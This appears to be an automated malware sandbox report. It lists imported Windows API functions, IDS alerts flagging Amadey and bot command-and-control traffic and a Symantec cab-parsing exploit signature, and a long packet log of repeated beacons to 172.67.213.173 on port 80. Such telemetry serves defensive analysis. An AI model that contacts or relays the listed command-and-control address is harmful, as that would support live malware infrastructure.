                                                                                                                                                                                                                      comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawIndirect, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                      shell32.dllSHGetFileInfoA, SHGetFileInfoW, SHFileOperationA, SHFileOperationW, ShellExecuteExA, ShellExecuteExW, ShellExecuteA, ShellExecuteW, ShellAboutW, Shell_NotifyIconW, FindExecutableW, ExtractIconW, ExtractAssociatedIconW
                                                                                                                                                                                                                      shell32.dllSHGetSpecialFolderPathW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc, SHGetDesktopFolder, SHGetDataFromIDListA, SHGetDataFromIDListW, SHBrowseForFolderW
                                                                                                                                                                                                                      comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                      winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                                                                                                                                                                                      user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                                                                                                                                                                                      msvcrt.dllmemset, memcpy
                                                                                                                                                                                                                      winspool.drvGetDefaultPrinterW
                                                                                                                                                                                                                      kernel32.dllGetVersionExW, CreateMutexW
                                                                                                                                                                                                                      msvcrt.dllsprintf, _ftol
                                                                                                                                                                                                                      msvcrt.dllstrncmp, _stricmp
                                                                                                                                                                                                                      cabinet.dllFCIDestroy, FCIFlushFolder, FCIFlushCabinet, FCIAddFile, FCICreate
                                                                                                                                                                                                                      cabinet.dllFDIDestroy, FDICopy, FDIIsCabinet, FDICreate
                                                                                                                                                                                                                      shell32.dllSHFormatDrive
                                                                                                                                                                                                                      winmm.dlltimeGetTime, PlaySoundW
                                                                                                                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                                                                                                                      oleacc.dllAccessibleObjectFromWindow, LresultFromObject
                                                                                                                                                                                                                      GDI32.DLLGetRandomRgn
                                                                                                                                                                                                                      shell32.dll
                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                      EnglishUnited States
                                                                                                                                                                                                                      SpanishArgentina
                                                                                                                                                                                                                      GermanGermany
                                                                                                                                                                                                                      ChineseChina
                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                      2024-10-31T14:25:18.189895+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949805TCP
                                                                                                                                                                                                                      2024-10-31T14:25:35.128154+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949903172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:37.559393+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949916172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:40.089539+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949930172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:40.089539+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.949930172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:42.511087+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949946172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:45.009461+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949962172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:47.403495+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949975172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:49.964778+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949987172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:52.486086+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949988172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:55.004933+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949989172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:55.832788+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949990TCP
                                                                                                                                                                                                                      2024-10-31T14:25:57.394572+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949991172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:25:59.923064+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949992172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:02.314368+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949993172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:04.816947+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949994172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:07.225159+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949995172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:09.717993+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949996172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:12.105745+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949997172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:14.590623+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.949998172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:17.158031+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.949999172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:19.728567+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950000172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:22.152809+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950001172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:24.678101+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950002172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:27.099760+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950003172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:29.635646+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950004172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:32.108410+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950005172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:34.627410+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950006172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:37.057362+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950007172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:39.610237+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950008172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:42.002816+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950009172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:44.584818+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950010172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:46.990327+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950011172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:49.516602+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950012172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:51.935172+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950013172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:54.439609+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950014172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:56.940098+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950015172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:26:59.340883+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950016172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:27:01.600269+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950017172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:27:04.183234+01002856097ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)1192.168.2.950018172.67.213.17380TCP
                                                                                                                                                                                                                      2024-10-31T14:27:06.558317+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.950019172.67.213.17380TCP
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.236412048 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.241323948 CET8049903172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.241509914 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.241723061 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:34.246669054 CET8049903172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:35.128082991 CET8049903172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:35.128154039 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.640705109 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.641011953 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.645987988 CET8049916172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.646136045 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.646187067 CET8049903172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.646239042 CET4990380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.647644997 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:36.652494907 CET8049916172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:37.559220076 CET8049916172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:37.559392929 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.197101116 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.197402000 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202455997 CET8049916172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202508926 CET4991680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202548981 CET8049930172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202615023 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.202775955 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:39.207724094 CET8049930172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:40.089376926 CET8049930172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:40.089539051 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.591605902 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.591917038 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597160101 CET8049930172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597235918 CET4993080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597388983 CET8049946172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597467899 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.597575903 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:41.602972984 CET8049946172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:42.510982037 CET8049946172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:42.511086941 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.139892101 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.140166998 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.145895958 CET8049962172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.146508932 CET8049946172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.146589041 CET4994680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.146604061 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.146783113 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:44.151736021 CET8049962172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:45.008002996 CET8049962172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:45.009460926 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.515228033 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.515518904 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.520673990 CET8049962172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.520723104 CET4996280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.521390915 CET8049975172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.521572113 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.521676064 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:46.526755095 CET8049975172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:47.403352022 CET8049975172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:47.403369904 CET8049975172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:47.403495073 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.031708002 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.031981945 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.036884069 CET8049987172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.036956072 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.037020922 CET8049975172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.037102938 CET4997580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.037106991 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.041866064 CET8049987172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.964687109 CET8049987172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.964777946 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.466712952 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.467061043 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621268034 CET8049988172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621407986 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621587038 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621613026 CET8049987172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621676922 CET4998780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.626372099 CET8049988172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:52.485980034 CET8049988172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:52.486085892 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.150373936 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.150691032 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.155752897 CET8049988172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.155776024 CET8049989172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.155832052 CET4998880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.155873060 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.164885044 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.169761896 CET8049989172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:55.004777908 CET8049989172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:55.004933119 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.514595985 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.514925003 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.519783020 CET8049991172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.519855976 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.520003080 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.520193100 CET8049989172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.520245075 CET4998980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.524787903 CET8049991172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:57.394423962 CET8049991172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:57.394572020 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.015856028 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.016259909 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.021770954 CET8049991172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.021785975 CET8049992172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.021909952 CET4999180192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.021992922 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.022228003 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.027463913 CET8049992172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.922946930 CET8049992172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.923063993 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.436777115 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.437068939 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442250013 CET8049993172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442331076 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442446947 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442811966 CET8049992172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442873955 CET4999280192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.447437048 CET8049993172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:02.314182997 CET8049993172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:02.314368010 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.947705030 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.948127031 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954138994 CET8049994172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954221964 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954351902 CET8049993172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954372883 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954412937 CET4999380192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.959883928 CET8049994172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:04.816848993 CET8049994172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:04.816946983 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.327600956 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.327923059 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.332730055 CET8049995172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.332847118 CET8049994172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.332901001 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.332909107 CET4999480192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.333141088 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.337946892 CET8049995172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:07.225070000 CET8049995172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:07.225158930 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.843626022 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.843939066 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.849817038 CET8049996172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.849833965 CET8049995172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.849885941 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.849915028 CET4999580192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.850112915 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.856162071 CET8049996172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:09.717773914 CET8049996172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:09.717993021 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.233972073 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.234162092 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239088058 CET8049997172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239187002 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239394903 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239723921 CET8049996172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239779949 CET4999680192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.244278908 CET8049997172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:12.105653048 CET8049997172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:12.105745077 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.734071016 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.734416008 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739361048 CET8049998172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739470005 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739478111 CET8049997172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739552021 CET4999780192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739603043 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.744585037 CET8049998172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:14.590442896 CET8049998172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:14.590622902 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.248765945 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.249046087 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.253856897 CET8049999172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.254039049 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.254049063 CET8049998172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.254087925 CET4999880192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.256545067 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:16.261548996 CET8049999172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:17.157974958 CET8049999172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:17.158030987 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.847446918 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.847762108 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852603912 CET8050000172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852653980 CET8049999172.67.213.173192.168.2.9
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852668047 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852714062 CET4999980192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.852936983 CET5000080192.168.2.9172.67.213.173
                                                                                                                                                                                                                      Oct 31, 2024 14:26:18.857682943 CET8050000172.67.213.173192.168.2.9
